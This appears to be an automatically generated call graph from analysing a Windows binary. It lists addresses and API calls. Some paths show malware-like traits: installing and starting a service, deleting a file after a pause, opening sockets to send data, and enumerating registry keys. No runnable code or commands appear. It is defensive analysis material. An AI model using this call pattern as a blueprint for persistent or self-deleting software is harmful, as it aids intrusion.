56468 43c75e 56461->56468 56463 43c736 56462->56463 56464 43c73f _strlen 56462->56464 56466 4220c0 3 API calls 56463->56466 56464->56463 56465 471402 4 API calls 56467 43c77b 56465->56467 56466->56468 56474 47f539 56467->56474 56468->56465 56471 43c7c4 56471->56460 56472 43c7a7 SendMessageA 56477 433f30 56472->56477 56476 46fe20 3 API calls 56474->56476 56475 43c78e 56475->56471 56475->56472 56476->56475 56478 433f46 56477->56478 56479 433f4a 56478->56479 56480 433fac SetWindowRgn 56478->56480 56479->56471 56480->56478 56480->56479 56481 4393e0 56482 4394a5 56481->56482 56486 4393f6 56481->56486 56487 47135c 56482->56487 56484 4394a3 56485 439470 SetTimer 56485->56484 56486->56484 56486->56485 56488 48142c 2 API calls 56487->56488 56489 471370 56488->56489 56489->56484 56490 433fe0 56491 47135c 2 API calls 56490->56491 56492 433fef 56491->56492 56493 433f30 SetWindowRgn 56492->56493 56494 433ff7 56493->56494 56495 442160 56496 442170 NtdllDefWindowProc_A 56495->56496 56497 442172 NtdllDefWindowProc_A 56495->56497 56499 4421a0 56496->56499 56497->56499 56500 4684e0 56501 468502 56500->56501 56502 468517 56501->56502 56503 468523 _strlen 56501->56503 56504 4220c0 3 API calls 56502->56504 56503->56502 56505 468548 56504->56505 56506 46855d _strlen 56505->56506 56507 468551 56505->56507 56506->56507 56508 4685a6 FindFirstFileA 56507->56508 56509 4685e1 56508->56509 56513 4685bc 56508->56513 56510 468604 _strlen 56509->56510 56511 4685f8 56509->56511 56509->56513 56510->56511 56512 4220c0 3 API calls 56511->56512 56514 468629 56512->56514 56514->56513 56515 468649 _strlen 56514->56515 56515->56513 56516 69e8b440 56517 69e8b48b ctype 56516->56517 56519 69e8b4a2 ctype 56517->56519 56607 69e85290 80 API calls ctype 56517->56607 56520 69e8b4d0 InitializeCriticalSection 56519->56520 56608 69e85290 80 API calls ctype 56519->56608 56552 69e915f0 56520->56552 56525 69e8b520 56609 69e84f40 80 API calls 3 library calls 56525->56609 56526 69e8b552 56610 69e85250 104 API calls 56526->56610 56528 69e8b582 56611 69e85250 104 API calls 56528->56611 56531 69e8b5d9 56534 69e8b5fd 56531->56534 56535 69e8b684 56531->56535 56532 69e8b53f ctype 56532->56531 56612 69e85290 80 API calls ctype 56532->56612 56613 69e8bb60 80 API calls ctype 56534->56613 56536 69e8b639 56535->56536 56616 69e8c0a0 80 API calls ctype 56535->56616 56571 69e8bf70 56536->56571 56540 69e8b611 56614 69e8baa0 80 API calls ctype 56540->56614 56542 69e8b627 56615 69e8c0a0 80 API calls ctype 56542->56615 56544 69e8b6bf 56580 69e8ca10 56544->56580 56545 69e8b6a0 ctype 56545->56544 56617 69e85290 80 API calls ctype 56545->56617 56618 69e91240 56552->56618 56554 69e91615 56558 69e91632 56554->56558 56642 69e915b0 242 API calls 56554->56642 56570 69e8b512 56558->56570 56643 69e8f290 56558->56643 56560 69e91695 56662 69ebfbf6 124 API calls 8 library calls 56560->56662 56562 69e916ba 56570->56525 56570->56526 56572 69e8bf9e ctype 56571->56572 56573 69e8bfb3 56572->56573 56962 69e85290 80 API calls ctype 56572->56962 56575 69e8bfd9 56573->56575 56577 69e8bff1 56573->56577 56963 69eb2d44 110 API calls ctype 56575->56963 56577->56577 56964 69e84f40 80 API calls 3 library calls 56577->56964 56579 69e8bfe2 56579->56545 56600 69e8ca6b _memset __mbsstr_l std::ios_base::clear ctype 56580->56600 56609->56532 56610->56528 56611->56532 56613->56540 56614->56542 56615->56536 56616->56536 56619 69ebed6c _malloc 67 API calls 56618->56619 56621 69e91256 _memset 56619->56621 56620 69e9125f 56620->56554 56621->56620 56667 69ebfba5 GetSystemTimeAsFileTime 56621->56667 56623 69e91280 56669 69ec07f1 56623->56669 56628 69e912b3 CreateEventA 56628->56620 56629 69e912c4 56628->56629 56631 69e91312 Sleep 56629->56631 56632 69e91323 WaitForMultipleObjects 56629->56632 56675 69ebef37 56629->56675 56631->56629 56631->56632 56633 69e91381 56632->56633 56634 69e8f290 127 API calls 56633->56634 56641 69e9144e 56633->56641 56636 69e91425 56634->56636 56635 69ebed6c _malloc 67 API calls 56637 69e91576 56635->56637 56638 69e8f290 127 API calls 56636->56638 56639 69e91593 56637->56639 56640 69ebef37 143 API calls 56637->56640 56638->56641 56639->56554 56640->56639 56641->56635 56642->56558 56644 69e8f2ad 56643->56644 56645 69e8f2a3 56643->56645 56647 69e8f2c4 56644->56647 56799 69e85290 80 API calls ctype 56644->56799 56798 69e85290 80 API calls ctype 56645->56798 56649 69e8f2db 56647->56649 56800 69e85290 80 API calls ctype 56647->56800 56651 69e8f2ee 56649->56651 56801 69e85290 80 API calls ctype 56649->56801 56653 69e8f301 56651->56653 56802 69e85290 80 API calls ctype 56651->56802 56654 69e8f314 56653->56654 56803 69e85290 80 API calls ctype 56653->56803 56795 69ec0e23 56654->56795 56659 69e8f360 56661 69ebfbf6 124 API calls 8 library calls 56659->56661 56661->56560 56662->56562 56668 69ebfbd5 __aulldiv 56667->56668 56668->56623 56670 69ec7833 __getptd 67 API calls 56669->56670 56671 69e91289 56670->56671 56672 69ec0803 56671->56672 56673 69ec7833 __getptd 67 API calls 56672->56673 56674 69e91291 CreateEventA 56673->56674 56674->56620 56674->56628 56676 69ebef6b 56675->56676 56677 69ebef4b 56675->56677 56679 69ec7645 ___set_flsgetvalue 8 API calls 56676->56679 56678 69ec2dca _fgets 67 API calls 56677->56678 56680 69ebef50 56678->56680 56681 69ebef71 56679->56681 56696 69ec24f4 6 API calls 2 library calls 56680->56696 56683 69ec8e33 __calloc_crt 67 API calls 56681->56683 56685 69ebef7d 56683->56685 56686 69ebefcf 56685->56686 56688 69ec7833 __getptd 67 API calls 56685->56688 56687 69ec0763 __free_locale 67 API calls 56686->56687 56689 69ebefd5 56687->56689 56690 69ebef8a 56688->56690 56691 69ec76d3 __mtinit 67 API calls 56690->56691 56805 69ec0b6e 56795->56805 56804 69e85290 80 API calls ctype 56806 69ec0b86 56805->56806 56813 69ec0ba8 __input_l __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 56805->56813 56808 69ec2dca _fgets 67 API calls 56806->56808 56807 69ec0de9 56809 69ec2dca _fgets 67 API calls 56807->56809 56812 69e8f345 56807->56812 56810 69ec0b8b 56808->56810 56809->56812 56842 69ec24f4 6 API calls 2 library calls 56810->56842 56812->56659 56812->56804 56813->56807 56814 69ec0d6c 56813->56814 56815 69ec0deb 56813->56815 56834 69ecc350 56814->56834 56859 69ec276f 67 API calls 4 library calls 56815->56859 56818 69ec0d71 56843 69ecc419 56818->56843 56835 69ecc35c _fgets 56834->56835 56836 69ecc390 _fgets 56835->56836 56837 69ec7d5d __lock 67 API calls 56835->56837 56836->56818 56838 69ecc36d 56837->56838 56839 69ecc37e 56838->56839 56860 69ecbc3b 56838->56860 56925 69ecc396 LeaveCriticalSection _doexit 56839->56925 56844 69ecc428 56843->56844 56845 69ec0d7a 56843->56845 56859->56807 56861 69ecbc47 _fgets 56860->56861 56925->56836 56963->56579 56964->56579 57028 69e81840 57031 69e873d0 57028->57031 57030 69e8184e 57041 69e89080 57031->57041 57033 69e873d9 57034 69e873e8 57033->57034 57035 69e873fe DeleteFileA GetLastError 57033->57035 57037 69e87412 57033->57037 57051 69e85ef0 20 API calls 57034->57051 57035->57037 57037->57030 57038 69e873ef 57038->57035 57039 69e89080 16 API calls 57038->57039 57040 69e873f8 57039->57040 57040->57035 57040->57037 57042 69e8909c _strrchr 57041->57042 57043 69e890a3 57042->57043 57046 69e890b8 __mbsstr_l ___crtGetEnvironmentStringsA 57042->57046 57044 69ebe9d7 _$I10_OUTPUT 5 API calls 57043->57044 57045 69e890b1 57044->57045 57045->57033 57052 69e88be0 57046->57052 57048 69e890fa 57049 69ebe9d7 _$I10_OUTPUT 5 API calls 57048->57049 57050 69e89111 57049->57050 57050->57033 57051->57038 57053 69e88c7d 57052->57053 57054 69e88bee 57052->57054 57053->57048 57054->57053 57055 69e88bf6 OpenSCManagerA 57054->57055 57056 69e88c0c 57055->57056 57057 69e88c12 57055->57057 57056->57048 57065 69e88ba0 CreateServiceA GetLastError CloseServiceHandle 57057->57065 57059 69e88c1e 57060 69e88c28 OpenServiceA 57059->57060 57061 69e88c71 CloseServiceHandle 57059->57061 57060->57061 57062 69e88c3b StartServiceA 57060->57062 57061->57048 57063 69e88c4a GetLastError CloseServiceHandle 57062->57063 57064 69e88c62 CloseServiceHandle CloseServiceHandle 57062->57064 57063->57048 57064->57048 57065->57059 57066 69ef95c3 57067 69ef9789 57066->57067 57070 69e8dbf0 57067->57070 57069 69ef8f9b 57083 69ef9b59 341 API calls 57070->57083 57072 69e8db8c 57072->57070 57079 69e8dc00 57072->57079 57073 69e8dc08 select 57074 69e8db33 57073->57074 57073->57079 57075 69ebe9d7 _$I10_OUTPUT 5 API calls 57074->57075 57077 69e8db46 57075->57077 57076 69e8dc43 send 57078 69e8dc5c WSAGetLastError 57076->57078 57076->57079 57077->57069 57078->57074 57078->57079 57079->57073 57079->57076 57080 69e8dc75 57079->57080 57081 69ebe9d7 _$I10_OUTPUT 5 API calls 57080->57081 57082 69e8dc88 57081->57082 57082->57069 57083->57072 57084 498ae4 ___set_flsgetvalue 57085 49fb9d 57084->57085 57086 498af3 ___fls_getvalue 57085->57086 57087 498afd 57086->57087 57088 498b1c __freefls 57086->57088 57092 498b05 ___fls_setvalue 57087->57092 57089 498b37 57088->57089 57090 498b40 __IsNonwritableInCurrentImage 57089->57090 57091 498b4f 57089->57091 57090->57091 57096 498aa3 57091->57096 57092->57089 57094 498b0f 57092->57094 57094->57088 57095 498b5a 57107 49c340 57096->57107 57098 498aaf __getptd 57108 44e5c0 57098->57108 57112 4451f0 57098->57112 57127 44fa90 _memset 57098->57127 57131 44e6f0 57098->57131 57135 46d460 _memset 57098->57135 57099 498abe 57137 498a5a 57099->57137 57101 498ac4 __XcptFilter 57101->57095 57107->57098 57109 44e605 57108->57109 57111 44e600 57108->57111 57153 44dc00 57109->57153 57111->57099 57113 44521a _memset _memset _memset 57112->57113 57121 445215 57112->57121 57114 4983ad _malloc 4 API calls 57113->57114 57115 445282 57114->57115 57116 4452a4 _memset 57115->57116 57115->57121 57117 4452d2 57116->57117 57117->57121 57261 445170 57117->57261 57119 44531c 57120 44536c _memset _memset 57119->57120 57119->57121 57123 4453a8 57120->57123 57121->57099 57122 44544e _strncpy 57125 445484 57122->57125 57123->57122 57268 422350 _memcpy_s 57123->57268 57264 46d9e0 57125->57264 57128 44faf7 57127->57128 57130 44fb12 57127->57130 57277 44efa0 _memset _memset 57128->57277 57130->57099 57132 44e704 57131->57132 57134 44e702 57131->57134 57133 44e767 Sleep 57132->57133 57132->57134 57133->57132 57133->57134 57134->57099 57136 46d4a6 57135->57136 57136->57099 57138 498a64 __IsNonwritableInCurrentImage 57137->57138 57140 498a73 57137->57140 57138->57140 57139 498a9a RtlExitUserThread 57143 498aa3 __read 57139->57143 57140->57139 57141 498a8c CloseHandle 57140->57141 57142 498a93 __freeptd 57140->57142 57141->57142 57142->57139 57144 498aaf __getptd 57143->57144 57148 4451f0 27 API calls 57144->57148 57149 44e5c0 54 API calls 57144->57149 57150 44fa90 6 API calls 57144->57150 57151 44e6f0 Sleep 57144->57151 57152 46d460 _memset 57144->57152 57145 498abe 57146 498a5a 72 API calls 57145->57146 57147 498ac4 __XcptFilter 57146->57147 57147->57101 57148->57145 57149->57145 57150->57145 57151->57145 57152->57145 57154 44dc1b 57153->57154 57155 44dc32 _memset _memset 57154->57155 57157 44dc8e 57155->57157 57156 44dc95 57156->57111 57157->57156 57171 44eee0 57157->57171 57159 44dcf3 57159->57156 57160 44de14 57159->57160 57175 44b7e0 57159->57175 57160->57156 57185 44c970 57160->57185 57172 44eeee 57171->57172 57193 44fc60 57172->57193 57174 44eefb 57174->57159 57176 448b50 2 API calls 57175->57176 57177 44b80c 57176->57177 57178 44b813 57177->57178 57180 44b87e _memset _memset 57177->57180 57181 44b920 _strlen 57177->57181 57182 44b973 _strlen 57177->57182 57183 4220c0 _memmove_s _memcpy_s _memcpy_s 57177->57183 57184 44b9c6 _strlen 57177->57184 57210 44a900 _memset 57177->57210 57178->57159 57180->57177 57181->57177 57182->57177 57183->57177 57184->57177 57186 44c979 57185->57186 57219 49938c 57186->57219 57194 4983ad _malloc 4 API calls 57193->57194 57195 44fc8a 57194->57195 57196 44fc9d _memset 57195->57196 57197 44fc96 57195->57197 57200 44fcc3 57196->57200 57197->57174 57198 44fcf5 _strlen 57198->57200 57199 498b5b 6 API calls 57199->57200 57200->57197 57200->57198 57200->57199 57205 44fd7e 57200->57205 57201 44fe2b 57202 4983ad _malloc 4 API calls 57201->57202 57203 44fe3d 57202->57203 57203->57197 57204 44fe49 _memset 57203->57204 57205->57201 57207 44fe03 57205->57207 57208 44fe0c _strlen 57205->57208 57209 4220c0 3 API calls 57207->57209 57208->57207 57209->57201 57262 44eee0 17 API calls 57261->57262 57263 445188 57262->57263 57263->57119 57265 46d9ed 57264->57265 57266 46da08 57264->57266 57269 46da20 57265->57269 57266->57121 57268->57122 57270 46da4c 57269->57270 57276 46da45 57269->57276 57276->57266 57278 44f067 57277->57278 57279 44f075 socket 57278->57279 57282 44f06e 57278->57282 57280 44f097 _memset 57279->57280 57279->57282 57281 44f0be _memset 57280->57281 57281->57282 57282->57130 57284 40ed70 57285 40ed79 57284->57285 57286 40edac 57285->57286 57287 40eeb0 VirtualAlloc 57285->57287 57287->57285 57287->57286 57288 425a70 57289 425a81 57288->57289 57290 474a0f ShowWindow 57289->57290 57291 425a91 57290->57291 57292 474a0f ShowWindow 57291->57292 57293 425aa1 57292->57293 57294 474a0f ShowWindow 57293->57294 57295 425ab1 57294->57295 57296 474a0f ShowWindow 57295->57296 57297 425ac1 57296->57297 57298 474a0f ShowWindow 57297->57298 57299 425ad1 57298->57299 57300 426e70 57301 47135c 2 API calls 57300->57301 57302 426e94 57301->57302 57303 426e9a SendMessageA 57302->57303 57304 426eec 57302->57304 57303->57304 57307 426ecf 57303->57307 57305 426fe1 57304->57305 57306 426ef6 SendMessageA 57304->57306 57309 426feb SendMessageA 57305->57309 57312 4270d6 57305->57312 57306->57305 57308 426f2f 57306->57308 57315 425af0 57307->57315 57308->57305 57309->57312 57313 427024 57309->57313 57310 427187 57312->57310 57314 42715e _memset 57312->57314 57313->57312 57314->57310 57316 425b01 57315->57316 57317 474a0f ShowWindow 57316->57317 57318 425b11 57317->57318 57319 474a0f ShowWindow 57318->57319 57320 425b21 57319->57320 57321 474a0f ShowWindow 57320->57321 57322 425b31 57321->57322 57323 474a0f ShowWindow 57322->57323 57324 425b41 57323->57324 57324->57304 57325 425370 57326 425389 57325->57326 57327 437890 6 API calls 57326->57327 57328 42540c 57327->57328 57333 43f270 57334 47135c 2 API calls 57333->57334 57335 43f27f task 57334->57335 57336 437b70 57344 440120 57336->57344 57338 437b94 57339 4733ec 3 API calls 57338->57339 57340 437c10 57339->57340 57341 437c14 SendMessageA SendMessageA 57340->57341 57342 437c69 57340->57342 57343 437c62 57341->57343 57343->57342 57345 44012f 57344->57345 57346 44024d 57345->57346 57349 4401b6 57345->57349 57352 440149 57345->57352 57347 44025c 57346->57347 57350 440305 57346->57350 57348 440267 _memset 57347->57348 57347->57352 57348->57352 57351 4401e4 _memset 57349->57351 57353 440397 _memcpy_s 57350->57353 57351->57352 57352->57338 57355 4403e2 57353->57355 57354 440408 _memset 57354->57352 57355->57354 57356 435770 57357 4733ec 3 API calls 57356->57357 57358 4357b4 57357->57358 57359 4357b8 SendMessageA 57358->57359 57360 4357d9 57358->57360 57359->57360 57361 442270 57362 44228a 57361->57362 57365 4423a0 57362->57365 57367 442397 57365->57367 57366 4422c5 57367->57365 57367->57366 57373 427610 57367->57373 57368 44248e 57369 441230 2 API calls 57368->57369 57370 442536 57368->57370 57369->57368 57370->57366 57377 441230 57370->57377 57374 42762a 57373->57374 57383 42da20 57374->57383 57376 4276be 57376->57368 57378 441242 57377->57378 57379 441247 57377->57379 57378->57370 57379->57378 57380 4412d4 SendMessageA 57379->57380 57380->57378 57381 4412f7 57380->57381 57381->57378 57382 441308 SendMessageA 57381->57382 57382->57378 57384 42da35 57383->57384 57385 42da2f 57383->57385 57384->57376 57385->57384 57387 42f8d0 57385->57387 57390 42f8df 57387->57390 57388 42f9ed 57388->57384 57390->57388 57391 42dac0 57390->57391 57392 42dadc 57391->57392 57393 42dc73 _memset _memset 57392->57393 57394 42db1b 57392->57394 57393->57394 57394->57388 57395 4422f0 57396 442312 57395->57396 57397 4423a0 4 API calls 57396->57397 57398 442368 57396->57398 57397->57398 57399 465e70 57400 4983ad _malloc 4 API calls 57399->57400 57401 465e8d _memset _memset 57400->57401 57402 465b20 57401->57402 57403 465ed5 _memset _sprintf _memset _strlen 57402->57403 57404 46c940 57403->57404 57405 465f54 _strlen 57404->57405 57406 465f6e 57405->57406 57407 465ffa _strlen 57405->57407 57408 465fb0 _strlen 57406->57408 57409 465fd8 57407->57409 57408->57409 57410 69e820d0 57411 69e820fd _memset 57410->57411 57412 69ebeff0 _sprintf 103 API calls 57411->57412 57413 69e82124 57412->57413 57437 69ebf2c5 57413->57437 57416 69e82148 OutputDebugStringA OutputDebugStringA 57447 69ebf38f 57416->57447 57417 69e82160 57419 69e821f6 57417->57419 57420 69e82176 MessageBoxA MessageBoxA MessageBoxA 57417->57420 57422 69ebf2c5 __wfopen_s 161 API calls 57419->57422 57421 69ebf2c5 __wfopen_s 161 API calls 57420->57421 57423 69e821c9 57421->57423 57424 69e8220a 57422->57424 57438 69ebf2f0 57437->57438 57439 69ebf2d5 57437->57439 57460 69ebf1ea 57438->57460 57440 69ec2dca _fgets 67 API calls 57439->57440 57442 69ebf2da 57440->57442 57479 69ec24f4 6 API calls 2 library calls 57442->57479 57443 69e82138 57443->57416 57443->57417 57444 69ebf300 57444->57443 57446 69ec2dca _fgets 67 API calls 57444->57446 57446->57443 57448 69ebf39b _fgets 57447->57448 57449 69ebf3af 57448->57449 57450 69ebf3cc 57448->57450 57463 69ebf1f6 _fgets 57460->57463 57461 69ebf209 57462 69ec2dca _fgets 67 API calls 57461->57462 57464 69ebf20e 57462->57464 57463->57461 57465 69ebf23e 57463->57465 57520 69ec24f4 6 API calls 2 library calls 57464->57520 57480 69eca0e6 57465->57480 57468 69ebf21e _fgets @_EH4_CallFilterFunc@8 57468->57444 57469 69ebf243 57470 69ebf24a 57469->57470 57471 69ebf257 57469->57471 57472 69ec2dca _fgets 67 API calls 57470->57472 57473 69ebf27e 57471->57473 57474 69ebf25e 57471->57474 57472->57468 57498 69ec9e1d 57473->57498 57475 69ec2dca _fgets 67 API calls 57474->57475 57475->57468 57481 69eca0f2 _fgets 57480->57481 57482 69ec7d5d __lock 67 API calls 57481->57482 57493 69eca100 57482->57493 57483 69eca175 57522 69eca215 57483->57522 57484 69eca17c 57486 69ec8dee __malloc_crt 67 API calls 57484->57486 57488 69eca186 57486->57488 57487 69eca20a _fgets 57487->57469 57488->57483 57531 69ecf043 InitializeCriticalSectionAndSpinCount _fgets 57488->57531 57490 69ec7c9a __mtinitlocknum 67 API calls 57490->57493 57492 69eca1ab 57494 69eca1c9 EnterCriticalSection 57492->57494 57495 69eca1b6 57492->57495 57493->57483 57493->57484 57493->57490 57525 69ec9d80 57493->57525 57530 69ec9dee LeaveCriticalSection LeaveCriticalSection _doexit 57493->57530 57494->57483 57496 69ec0763 __free_locale 67 API calls 57495->57496 57496->57483 57499 69ec9e3f 57498->57499 57500 69ec9e53 57499->57500 57512 69ec9e72 57499->57512 57502 69ec2dca _fgets 67 API calls 57500->57502 57501 69eca02f 57504 69eca09f 57501->57504 57505 69eca085 57501->57505 57503 69ec9e58 57502->57503 57536 69ec24f4 6 API calls 2 library calls 57503->57536 57533 69ed2c7f 57504->57533 57507 69ec2dca _fgets 67 API calls 57505->57507 57509 69eca08a 57507->57509 57541 69ec24f4 6 API calls 2 library calls 57509->57541 57512->57501 57512->57505 57537 69ed304e 77 API calls __mbsnbcmp_l 57512->57537 57514 69ec9ffa 57514->57505 57538 69ed2eca 102 API calls __mbsnbicmp_l 57514->57538 57516 69eca028 57516->57501 57532 69ec7c83 LeaveCriticalSection 57522->57532 57524 69eca21c 57524->57487 57526 69ec9d8d 57525->57526 57527 69ec9da3 EnterCriticalSection 57525->57527 57528 69ec7d5d __lock 67 API calls 57526->57528 57527->57493 57529 69ec9d96 57528->57529 57529->57493 57530->57493 57531->57492 57532->57524 57542 69ed2bb3 57533->57542 57537->57514 57538->57516 57693 69e818d0 57696 69e88e50 57693->57696 57695 69e818d5 57697 69e88e8b _memset 57696->57697 57698 69e88ec5 WSAStartup 57697->57698 57699 69e88edc gethostname 57698->57699 57707 69e88f38 _memset 57698->57707 57700 69e88f32 WSACleanup 57699->57700 57701 69e88ef4 57699->57701 57700->57707 57736 69ec0276 102 API calls 2 library calls 57701->57736 57703 69e88f4d 57705 69ebe9d7 _$I10_OUTPUT 5 API calls 57703->57705 57704 69e88f01 57737 69ec0276 102 API calls 2 library calls 57704->57737 57706 69e88f60 57705->57706 57706->57695 57707->57703 57721 69e88ce0 57707->57721 57709 69e88f1e ___crtGetEnvironmentStringsA 57709->57700 57712 69e88fc6 _memset ___crtGetEnvironmentStringsA 57713 69ebeff0 _sprintf 103 API calls 57712->57713 57714 69e89029 57713->57714 57729 69e88b30 57714->57729 57717 69e8905b CloseHandle 57718 69e89067 57717->57718 57719 69ebe9d7 _$I10_OUTPUT 5 API calls 57718->57719 57720 69e8907a 57719->57720 57720->57695 57722 69e88d1b _memset 57721->57722 57738 69e8a580 57722->57738 57725 69e8a580 103 API calls 57726 69e88dde ___crtGetEnvironmentStringsA 57725->57726 57727 69ebe9d7 _$I10_OUTPUT 5 API calls 57726->57727 57728 69e88e3d 57727->57728 57728->57703 57728->57712 57730 69e88b43 57729->57730 57731 69ebf2c5 __wfopen_s 161 API calls 57730->57731 57732 69e88b57 57731->57732 57733 69e88b70 OutputDebugStringA OutputDebugStringA 57732->57733 57734 69e88b8f CreateFileA 57732->57734 57735 69ebf38f __fcloseall 106 API calls 57733->57735 57734->57717 57734->57718 57735->57734 57736->57704 57737->57709 57739 69e8a590 57738->57739 57740 69ebeff0 _sprintf 103 API calls 57739->57740 57741 69e88dca 57740->57741 57741->57725 57742 69e86cd0 RegOpenKeyExA 57743 69e86d0d 57742->57743 57746 69e86d26 _memset 57742->57746 57744 69ebe9d7 _$I10_OUTPUT 5 API calls 57743->57744 57745 69e86d1f 57744->57745 57747 69e86d61 RegEnumKeyExA 57746->57747 57748 69e86d86 RegOpenKeyExA 57747->57748 57749 69e86f17 RegCloseKey 57747->57749 57750 69e86ef1 RegEnumKeyExA 57748->57750 57751 69e86da6 RegQueryValueExA 57748->57751 57752 69ebe9d7 _$I10_OUTPUT 5 API calls 57749->57752 57750->57748 57750->57749 57753 69e86ee6 RegCloseKey 57751->57753 57756 69e86dd5 _memset 57751->57756 57754 69e86f38 57752->57754 57753->57750 57756->57753 57757 69ebeff0 _sprintf 103 API calls 57756->57757 57763 69ebec8d 102 API calls 2 library calls 57756->57763 57758 69e86e59 RegOpenKeyExA 57757->57758 57758->57753 57759 69e86e7a RegQueryValueExA 57758->57759 57760 69e86edb RegCloseKey 57759->57760 57762 69e86ea1 57759->57762 57760->57753 57762->57760 57764 69ebec8d 102 API calls 2 library calls 57762->57764 57763->57756 57764->57762 57765 69e87852 57766 69e87859 57765->57766 57787 69e87430 57766->57787 57768 69e8786a 57769 69e87882 57768->57769 57770 69e87430 265 API calls 57768->57770 57771 69e89080 16 API calls 57769->57771 57786 69e8795c 57769->57786 57770->57769 57772 69e87899 57771->57772 57773 69e878a5 Sleep DeleteFileA 57772->57773 57772->57786 57801 69ea5000 57773->57801 57775 69ebe9d7 _$I10_OUTPUT 5 API calls 57777 69e87973 57775->57777 57786->57775 57788 69e8746e _memset _strncpy 57787->57788 57789 69e8ca10 195 API calls 57788->57789 57790 69e874a6 57789->57790 57791 69e874d1 57790->57791 57803 69ea4c80 129 API calls 5 library calls 57790->57803 57793 69ebe9d7 _$I10_OUTPUT 5 API calls 57791->57793 57795 69e874ea 57793->57795 57794 69e874bb 57804 69e9ad20 57794->57804 57795->57768 57797 69e874ca 57797->57791 57798 69e874f1 57797->57798 57799 69ebe9d7 _$I10_OUTPUT 5 API calls 57798->57799 57800 69e87507 57799->57800 57800->57768 57802 69ea502a _memset 57801->57802 57803->57794 57812 69e99b00 57804->57812 57806 69e9ad2b 57807 69e9ad34 57806->57807 57822 69e9a7f0 57806->57822 57807->57797 57809 69e9ad62 57866 69e9a630 67 API calls __free_locale 57809->57866 57811 69e9ad71 57811->57797 57813 69e99b1e _memset 57812->57813 57814 69ebed6c _malloc 67 API calls 57813->57814 57815 69e99b33 57814->57815 57816 69e99b5a 57815->57816 57867 69e99a10 67 API calls 3 library calls 57815->57867 57816->57806 57818 69e99c5f 57818->57806 57819 69e99b6b 57819->57818 57820 69ebed6c _malloc 67 API calls 57819->57820 57821 69e99c92 57820->57821 57821->57806 57823 69e9a836 57822->57823 57824 69e9aa72 57823->57824 57825 69ebed6c _malloc 67 API calls 57823->57825 57826 69ebe9d7 _$I10_OUTPUT 5 API calls 57824->57826 57827 69e9a84d 57825->57827 57828 69e9aa88 57826->57828 57829 69e9a858 57827->57829 57830 69e9a870 57827->57830 57828->57809 57831 69ebe9d7 _$I10_OUTPUT 5 API calls 57829->57831 57832 69e9a8a2 57830->57832 57839 69e9a8c0 57830->57839 57835 69e9a86c 57831->57835 57833 69e9aa5b 57832->57833 57834 69e9a8ae 57832->57834 57836 69ec0763 __free_locale 67 API calls 57833->57836 57915 69ed706e 69 API calls __dosmaperr 57834->57915 57835->57809 57836->57824 57838 69e9a8b8 57838->57833 57868 69e9a1f0 57839->57868 57841 69e9a8cc 57842 69e9aa5f 57841->57842 57844 69ebf2ae 161 API calls 57841->57844 57865 69e9a947 57841->57865 57842->57833 57865->57842 57866->57811 57867->57819 57869 69e9a210 57868->57869 57870 69e9a226 57868->57870 57871 69ebe9d7 _$I10_OUTPUT 5 API calls 57869->57871 57870->57869 57872 69e9a22b 57870->57872 57873 69e9a222 57871->57873 57874 69e9a235 57872->57874 57921 69e9a630 67 API calls __free_locale 57872->57921 57873->57841 57876 69e9a251 57874->57876 57877 69e9a267 57874->57877 57878 69ebe9d7 _$I10_OUTPUT 5 API calls 57876->57878 57879 69ebed6c _malloc 67 API calls 57877->57879 57915->57838 57921->57874 57937 423700 57938 423711 57937->57938 57939 42373a 57938->57939 57940 42372a _strlen 57938->57940 57945 4237b0 57939->57945 57940->57939 57942 42375a 57943 46de74 _Allocate 4 API calls 57942->57943 57944 423764 57943->57944 57948 427c70 57945->57948 57947 4237bc 57947->57942 57950 427c8c 57948->57950 57949 427d15 _memset 57951 427d4e 57949->57951 57950->57949 57950->57951 57951->57947 57952 466280 _memset 57953 465b20 57952->57953 57954 4662bc _memset _strlen 57953->57954 57955 46c940 57954->57955 57956 4662ff _strlen 57955->57956 57957 466315 57956->57957 57958 469b80 57959 469ba2 57958->57959 57960 469bab _memset _memset 57959->57960 57962 469ba6 57959->57962 57961 469bef 57960->57961 57963 69e91120 57964 69e911e8 57963->57964 57965 69e9114b 57963->57965 57971 69e90970 57965->57971 57968 69e911c2 SetEvent 57969 69e911d4 57969->57964 57970 69e911db SetEvent 57969->57970 57970->57964 57972 69e909dc ctype 57971->57972 57974 69e909f3 ctype 57972->57974 58052 69e85290 80 API calls ctype 57972->58052 57976 69e90a24 _memset 57974->57976 58053 69e85290 80 API calls ctype 57974->58053 58009 69e8d5f0 67 API calls 5 library calls 57976->58009 57978 69e90a98 57979 69e90a9f 57978->57979 58010 69e91770 144 API calls ctype 57978->58010 57981 69ebe9d7 _$I10_OUTPUT 5 API calls 57979->57981 57983 69e90deb 57981->57983 57983->57964 57983->57968 57983->57969 57984 69e90cb1 58056 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 57984->58056 57987 69e90c9f 58057 69ebfbf6 124 API calls 8 library calls 57987->58057 57990 69e90b1a 57990->57984 57992 69e90bdf 57990->57992 57996 69e90b21 57990->57996 58011 69e8d6d0 80 API calls ctype 57990->58011 58012 69e8eae0 57990->58012 57991 69e90cc9 58058 69ebfbf6 124 API calls 8 library calls 57991->58058 57994 69e90bfb 57992->57994 57992->57996 58042 69e90860 57994->58042 57995 69e90cea 58059 69ebfbf6 124 API calls 8 library calls 57995->58059 58054 69eb2b31 5 API calls 2 library calls 57996->58054 58000 69e90d05 58060 69ebfbf6 124 API calls 8 library calls 58000->58060 58005 69e90d2a 58061 69ebfbf6 124 API calls 8 library calls 58005->58061 58007 69e90d4f 58062 69eb2b31 5 API calls 2 library calls 58007->58062 58009->57978 58010->57990 58011->57990 58013 69e8d970 89 API calls 58012->58013 58014 69e8eb05 58013->58014 58015 69e8eb38 58014->58015 58016 69e8eb09 58014->58016 58063 69e8db10 5 API calls 2 library calls 58015->58063 58017 69e8eb1b 58016->58017 58018 69e8eb10 closesocket 58016->58018 58020 69ebe9d7 _$I10_OUTPUT 5 API calls 58017->58020 58018->58017 58022 69e8eb31 58020->58022 58021 69e8ec4a 58023 69e8ec5c 58021->58023 58024 69e8ec51 closesocket 58021->58024 58022->57990 58027 69ebe9d7 _$I10_OUTPUT 5 API calls 58023->58027 58024->58023 58026 69e8ecaa 58029 69e8ecbc 58026->58029 58030 69e8ecb1 closesocket 58026->58030 58031 69e8ec72 58027->58031 58028 69e8ec79 58032 69e8ec8d 58028->58032 58033 69e8ec82 closesocket 58028->58033 58034 69ebe9d7 _$I10_OUTPUT 5 API calls 58029->58034 58030->58029 58031->57990 58035 69ebe9d7 